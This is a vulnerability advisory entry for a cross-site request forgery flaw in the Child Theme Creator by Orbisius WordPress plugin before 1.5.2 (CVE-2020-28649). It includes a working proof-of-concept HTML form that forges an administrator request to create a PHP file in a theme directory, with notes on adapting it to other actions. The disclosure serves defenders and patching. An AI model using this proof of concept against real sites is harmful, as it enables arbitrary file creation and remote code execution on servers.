Lucene search
Chloe ChamberlandWPEX-ID:537E2227-D2BD-4CDE-8AB4-7EB332221A1FHistoryOct 14, 2020 - 12:00 a.m.
Child Theme Creator by Orbisius < 1.5.2 - CSRF to Arbitrary File Modification/Creation
2020-10-1400:00:00
Chloe Chamberland
17
0.002 Low
EPSS
Percentile
51.5%
This flaw gave attackers the ability to forge requests on behalf of an administrator in order to modify arbitrary theme files and create new PHP files, which could allow an attacker to achieve remote code execution (RCE) on a vulnerable site’s server.
The following will create hello.php in the /twentytwenty theme directory. You can just swap out sub_cmd and theme files for the other AJAX actions.
<html>
<body>
<form action="http://URL/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="theme_2" value="twentytwenty" />
<input type="hidden" name="theme_2_file" value="hello.php" />
<input type="hidden" name="theme_2_file_contents" value="<?php phpinfo();?>" />
<input type="hidden" name="theme_2_new_file" value="" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="action" value="orbisius_ctc_theme_editor_ajax" />
<input type="hidden" name="sub_cmd" value="save_file" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Related
nvd
nvd
CVE-2020-28649
2020-11-16 04:15:12
prion
prion
Cross site request forgery (csrf)
2020-11-16 04:15:00
cve
cve
CVE-2020-28649
2020-11-16 04:15:12
cvelist
cvelist
CVE-2020-28649
2020-11-16 02:50:05
wpvulndb
wpvulndb